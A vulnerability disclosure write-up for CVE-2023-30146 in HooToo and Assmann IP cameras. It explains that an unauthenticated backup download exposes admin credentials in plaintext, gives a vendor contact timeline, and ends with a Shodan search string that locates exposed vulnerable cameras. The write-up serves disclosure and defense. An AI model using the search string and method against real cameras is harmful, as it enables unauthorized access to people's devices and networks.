An issue was discovered in HooToo and Assmann branded IP-Cameras. The firmware stores the administrator and user credentials in the backup in plaintext. The backup can be retrieved and decompressed without authentication giving an remote attacker access to the network.

Sensitive Data Exposure

Remote

Possible network compromise

Many of the sold IP cameras in the IoT-market seem to be based on the HiSilicon H35xx SoC [1]. The firmware running on these devices seems to be manufactured by a company named Foscam (Shenzhen Foscam Intelligent Tech Co. Ltd) which is a big brand in the market for IP cameras and IoT devices. The cameras I cover here were sold under the HooToo and DIGITUS "Plug & View" by Assmann brand.

At the time of writing this Write-Up over 800 IP cameras with exactly these specifications can be accessed from the internet and put networks at risk. This number must be considered to be higher since I only checked for HooToo and Assmann branded IP cameras. If you have one of the affected cameras in your network please make sure that they can not communicate to the internet and consider upgrading it to a newer device.

Note: There is a PoC script that is scheduled to be released one month after publication of this writeup.

The basic concept of this exploit is, that an attacker visits the url to the backup retrieval command[2] in the web interface of the device directly. This causes the camera to write a copy of the current settings into a compressed binary file that then can be downloaded. The binary file can be decompressed by the attacker and the credentials can be read since they are stored in plaintext. The attacker can now log in into the admin account. At the latest the network should be considered breached now.

• 06 Apr 2022: Initial find on shodan and further research
• 22 Nov 2022: PoC writing & research into vendors
• 12 Jan 2023: Initial contact w/ new vendor "Assmann"
• 13 Jan 2023: New vendor response "Cameras are EOL."
• 07 Mar 2023: Contact w/ vendor to get status update
• 08 Mar 2023: New vendor response "In contact with engineers. Takes time because of lockdown in China."
• 23 Mar 2023: CVE requested at MITRE
• 05 May 2023: CVE assigned: CVE-2023-30146 [3]
• 08 Jun 2023: Contact w/ vendor to get status update / no response
• 03 Aug 2023: Public disclosure

• [1] https://openwrt.org/docs/techref/hardware/soc/soc.hisilicon.hi35xx
• [2] http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
• [3] https://www.cve.org/CVERecord?id=CVE-2023-30146

Shodan.io dork (HooToo/Assmann):

server: thttpd/2.25b 29dec2003 html:"ipCAM" http.component:"jQuery"